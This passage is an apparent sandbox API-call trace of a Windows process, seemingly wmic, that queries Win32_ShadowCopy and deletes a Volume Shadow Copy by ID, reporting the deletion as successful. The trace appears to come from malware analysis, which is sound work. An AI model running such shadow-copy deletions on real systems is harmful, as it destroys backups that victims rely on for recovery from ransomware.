SafeArrayGetElement (in: psa=0x154aa0, rgIndices=0x28f044, pv=0x28f098 | out: pv=0x28f098) returned 0x0 [0115.194] malloc (_Size=0x18) returned 0x3ecba0 [0115.194] malloc (_Size=0x18) returned 0x3ecc00 [0115.194] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0115.195] free (_Block=0x3ecba0) [0115.195] IUnknown:Release (This=0x1cf0a50) returned 0x0 [0115.195] free (_Block=0x3ecca0) [0115.195] ??1CHString@@QEAA@XZ () returned 0x9174401 [0115.195] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.195] free (_Block=0x3ecb80) [0115.195] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.195] lstrlenW (lpString="Shadow copy management.") returned 23 [0115.195] malloc (_Size=0x30) returned 0x3e85c0 [0115.195] lstrlenW (lpString="Shadow copy management.") returned 23 [0115.195] free (_Block=0x3ecc00) [0115.195] IUnknown:Release (This=0x1cf04e0) returned 0x0 [0115.195] free (_Block=0x3ecbc0) [0115.195] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.195] lstrlenW (lpString="PATH") returned 4 [0115.195] lstrlenW (lpString="where") returned 5 [0115.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0115.195] lstrlenW (lpString="WHERE") returned 5 [0115.195] lstrlenW (lpString="where") returned 5 [0115.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0115.195] lstrlenW (lpString="/") returned 1 [0115.195] lstrlenW (lpString="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 43 [0115.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0115.195] lstrlenW (lpString="-") returned 1 [0115.195] lstrlenW (lpString="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 43 [0115.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0115.195] lstrlenW (lpString="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 43 [0115.195] malloc (_Size=0x58) returned 0x3ed020 [0115.195] lstrlenW (lpString="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 43 [0115.196] lstrlenW (lpString="/") returned 1 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0115.196] lstrlenW (lpString="-") returned 1 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] malloc (_Size=0xe) returned 0x3ecbc0 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] lstrlenW (lpString="GET") returned 3 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0115.196] lstrlenW (lpString="LIST") returned 4 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0115.196] lstrlenW (lpString="SET") returned 3 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0115.196] lstrlenW (lpString="CREATE") returned 6 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0115.196] lstrlenW (lpString="CALL") returned 4 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0115.196] lstrlenW (lpString="ASSOC") returned 5 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0115.196] lstrlenW (lpString="DELETE") returned 6 [0115.196] lstrlenW (lpString="delete") returned 6 [0115.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0115.196] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.196] malloc (_Size=0x3e) returned 0x3ed080 [0115.196] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.196] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0115.196] malloc (_Size=0x18) returned 0x3ecc00 [0115.197] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0115.197] lstrlenW (lpString="FROM") returned 4 [0115.197] lstrlenW (lpString="*") returned 1 [0115.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0115.197] malloc (_Size=0x18) returned 0x3ecb80 [0115.197] free (_Block=0x3ecc00) [0115.197] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0115.197] lstrlenW (lpString="FROM") returned 4 [0115.197] lstrlenW (lpString="from") returned 4 [0115.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0115.197] malloc (_Size=0x18) returned 0x3ecc00 [0115.197] free (_Block=0x3ecb80) [0115.197] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0115.197] malloc (_Size=0x18) returned 0x3ecb80 [0115.197] free (_Block=0x3ecc00) [0115.197] free (_Block=0x3ed080) [0115.197] free (_Block=0x3ecb80) [0115.197] lstrlenW (lpString="SET") returned 3 [0115.197] lstrlenW (lpString="delete") returned 6 [0115.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0115.197] lstrlenW (lpString="CREATE") returned 6 [0115.197] lstrlenW (lpString="delete") returned 6 [0115.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0115.197] free (_Block=0x3ecef0) [0115.197] malloc (_Size=0x8) returned 0x3e6f20 [0115.197] lstrlenW (lpString="GET") returned 3 [0115.197] lstrlenW (lpString="delete") returned 6 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0115.198] lstrlenW (lpString="LIST") returned 4 [0115.198] lstrlenW (lpString="delete") returned 6 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0115.198] lstrlenW (lpString="ASSOC") returned 5 [0115.198] lstrlenW (lpString="delete") returned 6 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0115.198] WbemLocator:IUnknown:AddRef (This=0x1cd1390) returned 0x3 [0115.198] free (_Block=0x3fdfb0) [0115.198] lstrlenW (lpString="") returned 0 [0115.198] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0115.198] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.198] malloc (_Size=0x14) returned 0x3ecb80 [0115.198] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.198] GetCurrentThreadId () returned 0xb40 [0115.198] GetCurrentProcess () returned 0xffffffffffffffff [0115.198] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f420 | out: TokenHandle=0x28f420*=0x27c) returned 1 [0115.198] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f418 | out: TokenInformation=0x0, ReturnLength=0x28f418) returned 0 [0115.198] malloc (_Size=0x118) returned 0x3ed080 [0115.198] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x3ed080, TokenInformationLength=0x118, ReturnLength=0x28f418 | out: TokenInformation=0x3ed080, ReturnLength=0x28f418) returned 1 [0115.198] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x3ed080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-401127717, Attributes=0x4ea1), (Luid.LowPart=0x0, Luid.HighPart=4116208, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0115.198] free (_Block=0x3ed080) [0115.198] CloseHandle (hObject=0x27c) returned 1 [0115.198] lstrlenW (lpString="GET") returned 3 [0115.198] lstrlenW (lpString="delete") returned 6 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0115.198] lstrlenW (lpString="LIST") returned 4 [0115.198] lstrlenW (lpString="delete") returned 6 [0115.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0115.198] lstrlenW (lpString="SET") returned 3 [0115.199] lstrlenW (lpString="delete") returned 6 [0115.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0115.199] lstrlenW (lpString="CALL") returned 4 [0115.199] lstrlenW (lpString="delete") returned 6 [0115.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0115.199] lstrlenW (lpString="ASSOC") returned 5 [0115.199] lstrlenW (lpString="delete") returned 6 [0115.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0115.199] lstrlenW (lpString="CREATE") returned 6 [0115.199] lstrlenW (lpString="delete") returned 6 [0115.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0115.199] lstrlenW (lpString="DELETE") returned 6 [0115.199] lstrlenW (lpString="delete") returned 6 [0115.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0115.199] malloc (_Size=0x18) returned 0x3ecc00 [0115.199] lstrlenA (lpString="") returned 0 [0115.199] malloc (_Size=0x2) returned 0x3fdfb0 [0115.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfff5314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.199] free (_Block=0x3fdfb0) [0115.199] malloc (_Size=0x18) returned 0x3ecca0 [0115.199] lstrlenA (lpString="") returned 0 [0115.199] malloc (_Size=0x2) returned 0x3fdfb0 [0115.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfff5314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.199] free (_Block=0x3fdfb0) [0115.199] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.199] malloc (_Size=0x3e) returned 0x3ed080 [0115.199] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.199] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0115.199] malloc (_Size=0x18) returned 0x3ecba0 [0115.199] free (_Block=0x3ecca0) [0115.200] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0115.200] lstrlenW (lpString="FROM") returned 4 [0115.200] lstrlenW (lpString="*") returned 1 [0115.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0115.200] malloc (_Size=0x18) returned 0x3ecca0 [0115.200] free (_Block=0x3ecba0) [0115.200] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0115.200] lstrlenW (lpString="FROM") returned 4 [0115.200] lstrlenW (lpString="from") returned 4 [0115.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0115.200] malloc (_Size=0x18) returned 0x3ecba0 [0115.200] free (_Block=0x3ecca0) [0115.200] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0115.200] malloc (_Size=0x18) returned 0x3ecca0 [0115.200] free (_Block=0x3ecba0) [0115.200] free (_Block=0x3ed080) [0115.200] malloc (_Size=0x18) returned 0x3ecba0 [0115.200] malloc (_Size=0x18) returned 0x3ecc20 [0115.200] malloc (_Size=0x18) returned 0x3ecc40 [0115.200] malloc (_Size=0x18) returned 0x3ecc60 [0115.200] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0115.200] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0115.200] malloc (_Size=0x18) returned 0x3ecc80 [0115.200] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0115.200] SysStringLen (param_1=" WHERE ") returned 0x7 [0115.201] malloc (_Size=0x18) returned 0x3eccc0 [0115.201] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0115.201] SysStringLen (param_1="ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 0x2b [0115.201] free (_Block=0x3ecc00) [0115.201] free (_Block=0x3ecc80) [0115.201] free (_Block=0x3ecc60) [0115.201] free (_Block=0x3ecc40) [0115.201] free (_Block=0x3ecc20) [0115.201] free (_Block=0x3ecba0) [0115.201] ??0CHString@@QEAA@XZ () returned 0x28f390 [0115.201] GetCurrentThreadId () returned 0xb40 [0115.201] malloc (_Size=0x18) returned 0x3ecba0 [0115.201] malloc (_Size=0x18) returned 0x3ecc20 [0115.201] malloc (_Size=0x18) returned 0x3ecc40 [0115.201] malloc (_Size=0x18) returned 0x3ecc60 [0115.201] malloc (_Size=0x18) returned 0x3ecc80 [0115.201] SysStringLen (param_1="\\\\") returned 0x2 [0115.201] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0115.201] malloc (_Size=0x18) returned 0x3ecc00 [0115.201] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0115.201] SysStringLen (param_1="\\") returned 0x1 [0115.202] malloc (_Size=0x18) returned 0x3ecce0 [0115.202] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0115.202] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0115.202] free (_Block=0x3ecc00) [0115.202] free (_Block=0x3ecc80) [0115.202] free (_Block=0x3ecc60) [0115.202] free (_Block=0x3ecc40) [0115.202] free (_Block=0x3ecc20) [0115.202] free (_Block=0x3ecba0) [0115.202] malloc (_Size=0x18) returned 0x3ecba0 [0115.202] malloc (_Size=0x18) returned 0x3ecc20 [0115.202] malloc (_Size=0x18) returned 0x3ecc40 [0115.202] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xfffc29d0 | out: ppNamespace=0xfffc29d0*=0x1ce3c18) returned 0x0 [0115.205] free (_Block=0x3ecc40) [0115.205] free (_Block=0x3ecc20) [0115.205] free (_Block=0x3ecba0) [0115.205] CoSetProxyBlanket (pProxy=0x1ce3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.205] free (_Block=0x3ecce0) [0115.205] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.205] ??0CHString@@QEAA@XZ () returned 0x28f2e0 [0115.205] GetCurrentThreadId () returned 0xb40 [0115.206] malloc (_Size=0x18) returned 0x3ecce0 [0115.206] lstrlenA (lpString="") returned 0 [0115.206] malloc (_Size=0x2) returned 0x3fdfb0 [0115.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfff5314c, cbMultiByte=-1, lpWideCharStr=0x3fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.206] free (_Block=0x3fdfb0) [0115.206] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 0x50 [0115.206] SysStringLen (param_1="") returned 0x0 [0115.206] free (_Block=0x3ecce0) [0115.206] malloc (_Size=0x18) returned 0x3ecce0 [0115.206] IWbemServices:ExecQuery (in: This=0x1ce3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'", lFlags=0, pCtx=0x0, ppEnum=0x28f2e8 | out: ppEnum=0x28f2e8*=0x1ce3d18) returned 0x0 [0115.239] free (_Block=0x3ecce0) [0115.239] CoSetProxyBlanket (pProxy=0x1ce3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.241] IEnumWbemClassObject:Next (in: This=0x1ce3d18, lTimeout=-1, uCount=0x1, apObjects=0x28f2f0, puReturned=0x28f300 | out: apObjects=0x28f2f0*=0x1ce3d80, puReturned=0x28f300*=0x1) returned 0x0 [0115.242] malloc (_Size=0x18) returned 0x3ecce0 [0115.242] IWbemClassObject:Get (in: This=0x1ce3d80, wszName="__PATH", lFlags=0, pVal=0x28f310*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f310*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.242] free (_Block=0x3ecce0) [0115.242] malloc (_Size=0x800) returned 0x3ed080 [0115.242] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x3ed080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0115.242] FormatMessageW (in: dwFlags=0x2500, lpSource=0x3ed080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x28f238, nSize=0x0, Arguments=0x28f248 | out: lpBuffer="뚐\x13") returned 0x67 [0115.243] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0115.243] malloc (_Size=0x68) returned 0x3ed890 [0115.243] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x3ed890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0115.243] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xfffc2ab0 [0115.243] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0115.243] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0115.243] free (_Block=0x3ed890) [0115.243] free (_Block=0x3ed080) [0115.243] LocalFree (hMem=0x13b690) returned 0x0 [0115.243] IWbemServices:DeleteInstance (in: This=0x1ce3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0116.160] IUnknown:Release (This=0x1ce3d80) returned 0x0 [0116.160] malloc (_Size=0x800) returned 0x3ed080 [0116.160] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x3ed080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0116.160] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.160] malloc (_Size=0x20) returned 0x3ecef0 [0116.160] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x3ecef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0116.160] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xfffc2ab0 [0116.160] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0116.161] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0116.161] free (_Block=0x3ecef0) [0116.161] free (_Block=0x3ed080) [0116.161] IEnumWbemClassObject:Next (in: This=0x1ce3d18, lTimeout=-1, uCount=0x1, apObjects=0x28f2f0, puReturned=0x28f300 | out: apObjects=0x28f2f0*=0x0, puReturned=0x28f300*=0x0) returned 0x1 [0116.162] IUnknown:Release (This=0x1ce3d18) returned 0x0 [0116.163] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0116.163] free (_Block=0x3ecca0) [0116.163] free (_Block=0x3eccc0) [0116.163] GetCurrentThreadId () returned 0xb40 [0116.163] ??0CHString@@QEAA@PEBG@Z () returned 0x28f4c8 [0116.163] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x28f4c8 [0116.163] lstrlenW (lpString="LIST") returned 4 [0116.163] lstrlenW (lpString="delete") returned 6 [0116.163] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0116.163] lstrlenW (lpString="ASSOC") returned 5 [0116.163] lstrlenW (lpString="delete") returned 6 [0116.163] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0116.163] lstrlenW (lpString="GET") returned 3 [0116.163] lstrlenW (lpString="delete") returned 6 [0116.163] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0116.164] ??1CHString@@QEAA@XZ () returned 0x9174401 [0116.164] WbemLocator:IUnknown:Release (This=0x1ce3c18) returned 0x0 [0116.164] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0116.164] _kbhit () returned 0x0 [0116.165] free (_Block=0x3e6f20) [0116.165] free (_Block=0x3ecac0) [0116.165] free (_Block=0x3ecaa0) [0116.165] free (_Block=0x3eca80) [0116.165] free (_Block=0x3eca60) [0116.165] free (_Block=0x3e70a0) [0116.165] free (_Block=0x3ecb40) [0116.165] free (_Block=0x3e85c0) [0116.165] free (_Block=0x3ed020) [0116.165] free (_Block=0x3ecbc0) [0116.165] free (_Block=0x3ecfa0) [0116.165] free (_Block=0x3ecae0) [0116.165] free (_Block=0x3ecbe0) [0116.165] free (_Block=0x3e7140) [0116.165] free (_Block=0x3e6e00) [0116.165] free (_Block=0x3ecff0) [0116.165] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0116.165] free (_Block=0x3ece20) [0116.165] free (_Block=0x3ecb00) [0116.166] free (_Block=0x3ecb20) [0116.166] free (_Block=0x3ecf30) [0116.166] free (_Block=0x3ecb60) [0116.166] free (_Block=0x3e7ee0) [0116.166] free (_Block=0x3e7f30) [0116.166] free (_Block=0x3e7f80) [0116.166] free (_Block=0x3ecb80) [0116.166] free (_Block=0x3e6a20) [0116.166] free (_Block=0x3e6de0) [0116.166] free (_Block=0x3e8040) [0116.166] free (_Block=0x3e6dc0) [0116.166] free (_Block=0x3e8000) [0116.166] free (_Block=0x3e6d60) [0116.166] free (_Block=0x3e6d80) [0116.166] free (_Block=0x3e6c40) [0116.166] free (_Block=0x3e6c60) [0116.166] free (_Block=0x3e6be0) [0116.166] free (_Block=0x3e6c00) [0116.166] free (_Block=0x3e6ca0) [0116.166] free (_Block=0x3e6cc0) [0116.166] free (_Block=0x3e6d00) [0116.166] free (_Block=0x3e6d20) [0116.167] free (_Block=0x3e6b20) [0116.167] free (_Block=0x3e6b40) [0116.167] free (_Block=0x3e6ac0) [0116.167] free (_Block=0x3e6ae0) [0116.167] free (_Block=0x3e6b80) [0116.167] free (_Block=0x3e6ba0) [0116.167] free (_Block=0x3e6a60) [0116.167] free (_Block=0x3e6a80) [0116.167] free (_Block=0x3e69d0) [0116.167] free (_Block=0x3e69a0) [0116.167] free (_Block=0x3e6e90) [0116.167] WbemLocator:IUnknown:Release (This=0x1cd1390) returned 0x2 [0116.167] WbemLocator:IUnknown:Release (This=0x1ce3b28) returned 0x0 [0116.167] WbemLocator:IUnknown:Release (This=0x1ce3a98) returned 0x0 [0116.168] WbemLocator:IUnknown:Release (This=0x1cd1390) returned 0x1 [0116.168] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0116.168] WbemLocator:IUnknown:Release (This=0x1cd1390) returned 0x0 [0116.168] free (_Block=0x3ec9e0) [0116.168] free (_Block=0x3eca00) [0116.168] free (_Block=0x3e8540) [0116.168] free (_Block=0x3eca20) [0116.168] free (_Block=0x3eca40) [0116.168] free (_Block=0x3e8580) [0116.168] free (_Block=0x3ec860) [0116.168] free (_Block=0x3ec880) [0116.168] free (_Block=0x3e83c0) [0116.168] free (_Block=0x3ec8a0) [0116.168] free (_Block=0x3ec8c0) [0116.168] free (_Block=0x3e8400) [0116.168] free 